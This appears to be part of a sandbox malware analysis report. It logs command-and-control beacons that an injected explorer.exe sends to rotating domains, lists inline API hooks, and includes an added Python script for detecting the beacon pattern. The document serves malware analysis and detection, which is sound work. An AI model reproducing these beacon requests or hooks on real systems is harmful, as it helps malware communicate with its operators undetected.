7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 30 2f 30 36 20 32 31 3a 34 37 3a 30 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 
63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&amp;Gvw=T4RpitPpFtBLx</td></tr><tr><td>Server:</td><td>izj6cdw73oq972s9s7xjhxz</td></tr><tr><td>Date:</td><td>2023/10/06 21:47:05</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  3 | 192.168.2.8 | 49715 | 91.195.240.19 | 80 | C:\Windows\explorer.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Oct 6, 2023 15:47:26.584408998 CEST | 82 | OUT | GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.brownkrosshui.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:26.904335976 CEST | 84 | IN | HTTP/1.1 200 OK
                                                                                                  date: Fri, 06 Oct 2023 13:47:26 GMT
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  transfer-encoding: chunked
                                                                                                  vary: Accept-Encoding
                                                                                                  x-powered-by: PHP/8.1.17
                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  pragma: no-cache
                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Nh1jE+ZPH6FkiMhXIXgNE3BiRY7KJZSXir/jo+kbNPlv3WqxUpPB5zgVJa6pRJgXnKO+lsBVBhk9Jesw5ENKgA==
                                                                                                  last-modified: Fri, 06 Oct 2023 13:47:26 GMT
                                                                                                  x-cache-miss-from: parking-697977dd84-lqf6d
                                                                                                  server: NginX
                                                                                                  connection: close
                                                                                                  Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4e 68 31 6a 45 2b 5a 50 48 36 46 6b 69 4d 68 58 49 58 67 4e 45 33 42 69 52 59 37 4b 4a 5a 53 58 69 72 2f 6a 6f 2b 6b 62 4e 50 6c 76 33 57 71 78 55 70 50 42 35 7a 67 56 4a 61 36 70 52 4a 67 58 6e 4b 4f 2b 6c 73 42 56 42 68 6b 39 4a 65 73 77 35 45 4e 4b 67 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e
                                                                                                  Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Nh1jE+ZPH6FkiMhXIXgNE3BiRY7KJZSXir/jo+kbNPlv3WqxUpPB5zgVJa6pRJgXnKO+lsBVBhk9Jesw5ENKgA==><head><meta charset="utf-8"><title>brownkrosshui.com&nbsp;-&nbsp;brownkrosshui Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="brownkrosshui.com is your first and best source for all of the information youre looking for.
                                                                                                  Oct 6, 2023 15:47:26.904655933 CEST | 85 | IN | Data Raw: 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e
                                                                                                  Data Ascii: From general topics to more of what you would expect to find here, brownkrosshui.com has it all. We hope AECyou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templa
                                                                                                  Oct 6, 2023 15:47:26.904704094 CEST | 86 | IN | Data Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                  Data Ascii: rflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-app
                                                                                                  Oct 6, 2023 15:47:26.904755116 CEST | 87 | IN | Data Raw: 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34
                                                                                                  Data Ascii: ement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align
                                                                                                  Oct 6, 2023 15:47:26.904799938 CEST | 88 | IN | Data Raw: 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39
                                                                                                  Data Ascii: r-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__conten
                                                                                                  Oct 6, 2023 15:47:26.904849052 CEST | 89 | IN | Data Raw: 31 44 32 36 0d 0a 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69
                                                                                                  Data Ascii: 1D26cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-ri
                                                                                                  Oct 6, 2023 15:47:26.904896021 CEST | 91 | IN | Data Raw: 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e
                                                                                                  Data Ascii: al-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25p
                                                                                                  Oct 6, 2023 15:47:26.904946089 CEST | 92 | IN | Data Raw: 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f
                                                                                                  Data Ascii: #5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}
                                                                                                  Oct 6, 2023 15:47:26.904994011 CEST | 93 | IN | Data Raw: 74 65 6e 74 5f 5f 68 65 61 64 65 72 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72
                                                                                                  Data Ascii: tent__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position
                                                                                                  Oct 6, 2023 15:47:26.905041933 CEST | 95 | IN | Data Raw: 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65
                                                                                                  Data Ascii: t_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__
                                                                                                  Oct 6, 2023 15:47:27.187711954 CEST | 96 | IN | Data Raw: 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 64 6f 6d 61 69 6e
                                                                                                  Data Ascii: rmal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{width:100%;height:auto;max-width:1440px}.nc-


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  4 | 192.168.2.8 | 49716 | 62.72.50.244 | 80 | C:\Windows\explorer.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Oct 6, 2023 15:47:46.016751051 CEST | 108 | OUT | GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.usbulletinnow.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:46.152431965 CEST | 109 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Fri, 06 Oct 2023 13:47:46 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.usbulletinnow.com/hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 
3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.8  49719        66.96.160.140   80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Oct 6, 2023 15:48:06.495640039 CEST  144                 OUT        GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.im-newbie-journal.online
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
Oct 6, 2023 15:48:06.739032984 CEST  145                 IN         HTTP/1.1 302 Found
                                                                                                  Date: Fri, 06 Oct 2023 13:48:06 GMT
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Content-Length: 321
                                                                                                  Connection: close
                                                                                                  Server: Apache/2
                                                                                                  Location: https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx
                                                                                                  Cache-Control: max-age=3600
                                                                                                  Expires: Fri, 06 Oct 2023 14:48:06 GMT
                                                                                                  Age: 0
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6d 2d 6e 65 77 62 69 65 2d 6a 6f 75 72 6e 61 6c 2e 6f 6e 6c 69 6e 65 2f 68 65 73 66 2f 3f 6a 42 5a 3d 62 5a 30 63 4c 32 57 33 33 35 36 5a 64 51 4d 53 5a 78 30 68 62 46 41 6c 42 78 78 62 46 43 57 39 61 58 50 56 6a 43 48 49 49 6c 38 38 70 49 47 4f 35 61 63 58 46 77 4b 51 36 50 71 47 35 2f 44 57 74 68 67 5a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&amp;Gvw=T4RpitPpFtBLx">here</a>.</p></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
6           192.168.2.8  49720        103.224.182.242  80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Oct 6, 2023 15:48:27.268038988 CEST  146                 OUT        GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.tygyro.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
Oct 6, 2023 15:48:27.500077009 CEST  146                 IN         HTTP/1.1 302 Found
                                                                                                  date: Fri, 06 Oct 2023 13:48:27 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1696600107.6238826; expires=Mon, 03-Oct-2033 13:48:27 GMT; Max-Age=315360000
                                                                                                  location: http://ww38.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx&subid1=20231007-0048-2766-ac03-851b49f23700
                                                                                                  content-length: 2
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
                                                                                                  Data Raw: 0a 0a
                                                                                                  Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.8  49721        75.2.115.196    80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Oct 6, 2023 15:48:47.739145994 CEST  147                 OUT        GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.87b52.club
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
Oct 6, 2023 15:48:48.156855106 CEST  148                 IN         HTTP/1.1 403 Forbidden
                                                                                                  Date: Fri, 06 Oct 2023 13:48:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 146
                                                                                                  Connection: close
                                                                                                  Server: nginx
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
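Sessions 5 to 7 above share one shape: the request comes from the injected explorer.exe, each time to a different domain, always GET to the one-segment path /hesf/ with a long base64-looking jBZ value and the same short constant Gvw=T4RpitPpFtBLx, with Connection: close. Matching on the constant path plus constant parameter, rather than on any one of the rotating domains, is what lets a detection survive the domain rotation. The following Python is an added example (not part of the Joe Sandbox report) that groups request lines by that shape; the log line format ("process | host | request line") is constructed for the example, and the first three lines reuse the requests from the report.

```python
import base64
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample log, one request per line: "<process> | <host> | <request line>".
# Lines 1-3 reproduce sessions 5-7 of the report; line 4 is a benign request added
# to show what the check leaves alone.
SAMPLE_LOG_LINES = [
    "C:\\Windows\\explorer.exe | www.im-newbie-journal.online | GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1",
    "C:\\Windows\\explorer.exe | www.tygyro.com | GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1",
    "C:\\Windows\\explorer.exe | www.87b52.club | GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1",
    "C:\\Program Files\\Mozilla Firefox\\firefox.exe | example.org | GET /index.html?lang=en HTTP/1.1",
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class Request:
    process: str
    host: str
    method: str
    path: str
    params: dict


def parse_line(line: str) -> Request:
    """Split one constructed log line into its fields.
    The query is split by hand: urllib's parse_qsl would turn '+' into ' ' and
    corrupt a base64 value such as the jBZ blob."""
    process, host, request_line = (s.strip() for s in line.split(" | ", 2))
    method, target, _version = request_line.split()
    parts = urlsplit(target)
    params = {}
    for pair in parts.query.split("&") if parts.query else []:
        key, _, value = pair.partition("=")
        params[key] = value
    return Request(process, host, method, parts.path, params)


def is_b64_blob(value: str, min_len: int = 32) -> bool:
    """True for a standard-alphabet base64 string of at least min_len characters
    that decodes cleanly; a short token such as T4RpitPpFtBLx is rejected."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.match(value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def beacon_key(req: Request):
    """Return (path, constant-param name, constant-param value) when the request has
    the shape seen in the report: GET, a single short path segment, exactly two query
    parameters, one a long base64 blob and the other a short constant. Else None."""
    if req.method != "GET" or len(req.params) != 2:
        return None
    if not re.fullmatch(r"/[A-Za-z0-9]{2,8}/", req.path):
        return None
    blobs = [k for k, v in req.params.items() if is_b64_blob(v)]
    consts = [k for k, v in req.params.items() if not is_b64_blob(v) and 4 <= len(v) <= 24]
    if len(blobs) != 1 or len(consts) != 1:
        return None
    return (req.path, consts[0], req.params[consts[0]])


def cluster_beacons(lines):
    """Group matching requests by (path, constant parameter), recording host and
    sending process. Several distinct hosts under one key is the rotating-domain
    pattern; a single host is weaker evidence and needs the process context."""
    clusters = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        req = parse_line(line)
        key = beacon_key(req)
        if key:
            clusters[key].add((req.host, req.process.rsplit("\\", 1)[-1].lower()))
    return {k: sorted(v) for k, v in clusters.items()}


if __name__ == "__main__":
    for (path, name, value), hits in cluster_beacons(SAMPLE_LOG_LINES).items():
        print(f"{path} {name}={value}: {len(hits)} host(s)")
        for host, proc in hits:
            print(f"  {host} from {proc}")
```

The path regex and the parameter-length bounds are tuning knobs, not protocol facts: they are set from the three requests on this page, and a production rule would pair the shape match with the sending process (a shell process such as explorer.exe making HTTP requests is itself the stronger signal) rather than rely on the shape alone.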


                                                                                                  Code Manipulations

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
